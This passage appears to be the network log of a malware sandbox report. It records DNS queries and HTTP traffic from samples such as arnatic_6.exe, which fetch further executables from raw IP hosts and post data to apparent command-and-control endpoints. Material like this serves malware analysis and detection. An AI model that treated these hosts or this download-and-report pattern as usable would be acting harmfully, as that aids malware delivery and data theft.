                                                                                                                                                                                        Host: pcfixmy-download-13.xyz
                                                                                                                                                                                        Content-Length: 2787
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eVXVxDODVQdUY9ppAFaet8JKqJWXkd0BkddrJVnchJiWskr9PWGZ%2BcEILrgl1KBM2B4Od4nOq2mhnQuY9RDdgw3ExW0VH8i7gOI7Lc24LhYSRLtiz9OOHUdMLkQIS8%2BJmoa87sU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686156ace81acac-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/1vpFz7
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1vpFz7 HTTP/1.1
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:08 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=t3aiug7kdk92rm8r1kc5717hp0; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=185.100.87.202; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838083; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 5
                                                                                                                                                                                        whoami: 66dc2a05a832ae7f9e5ca94bc91789a03af84f18776705db53eb24fade17bd93
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:14 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab68b80000fab0aba27000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7j%2BGZjSZEes8ILb2x8QGhdNNfZZJKtc5KJ1%2BuSqsJnUi%2FaAJDrAV1kefYEU%2BIeBRi1OzPrev4wYnSYHDY6ccSQ6vB5mVZaym0vKy6xINL%2BeA3Mtv7eW9dOpHrwbkjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614edffa7fab0-OSL
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/server.txt
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /server.txt HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:18 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Wed, 30 Jun 2021 10:04:51 GMT
                                                                                                                                                                                        ETag: "12-5c5f8da7cddac"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 18
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        34.117.59.81
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/widget
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /widget HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Referer: https://ipinfo.io/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        x-frame-options: DENY
                                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                        content-length: 826
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:15:19 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 20
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:21 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:21 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:22 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=96
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:23 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 2112
                                                                                                                                                                                        Keep-Alive: timeout=5, max=95
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://136.144.41.201/WW/file2.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /WW/file2.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 10:45:11 GMT
                                                                                                                                                                                        ETag: "cc000-5c60d88942c4a"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 835584
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://136.144.41.201/WW/file6.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /WW/file6.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 08:23:41 GMT
                                                                                                                                                                                        ETag: "5fd88-5c60b8e869d95"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 392584
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file4.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file4.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 18:16:25 GMT
                                                                                                                                                                                        ETag: "176ac0-5c613d64ed0f5"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 1534656
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://136.144.41.201/WW/file4.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /WW/file4.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 18:16:25 GMT
                                                                                                                                                                                        ETag: "176ac0-5c613d64ed0f5"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 1534656
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /WW/file3.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Fri, 02 Jul 2021 07:04:22 GMT
                                                                                                                                                                                        ETag: "a54c8-5c61e90b9eba8"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 677064
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file2.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file2.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 10:45:11 GMT
                                                                                                                                                                                        ETag: "cc000-5c60d88942c4a"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 835584
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file3.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://185.20.227.194/install.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.20.227.194:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /install.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 185.20.227.194
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        176.99.131.168
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        89.221.213.3
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.65.45
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.158.82
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.202.130
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.76.249
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.135.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.129.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.133.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.134.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.130.233
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
